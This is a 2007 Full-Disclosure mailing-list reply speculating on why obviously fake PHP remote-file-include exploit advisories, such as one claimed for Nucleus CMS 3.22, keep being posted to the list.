Date: Mon, 7 May 2007 14:12:49 -0400
From: "Ron Superior" <rsuperior@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: nucleus 3.22 >> RFI

Hi folks,

  Some months back I seem to remember people hypothesizing as to the
real purpose behind some of these particularly lame fake PHP exploits.
 You know the ones I mean; they're mostly remote file includes, they
often are decorated with some simple ASCII art, and the "thanks" and
"greetz" sections are always loaded with names that suggest Turkish or
other Middle Eastern origin.

  The two most interesting suggestions that I recall were:

  1) Somebody wanted to pump up the lists with PHP exploits so they
could claim later that some large number X of PHP vulnerabilities had
been posted to FD since some date.

  2) Covert communication, or that the "exploits" were really secret
messages between t3rr0ri$ts or something.

  I'm sure there exists a motive beyond just spamming us to be
annoying.  Any one have any new ideas, or good arguments for either of
the above two ideas?

    Ron

Guasconi Vincent wrote:
> On 5/6/07, security curmudgeon <jericho@...rition.org> wrote:
>> : VENDOR :http://nucleuscms.org/
>> : BY : s3rv3r_hack3r (hackerz.ir admin)
>> : bug:
>> : nucleus3.22/nucleus/plugins/skinfiles/index.php       =
include($DIR_LIBS . 'PLUGINADMIN.php');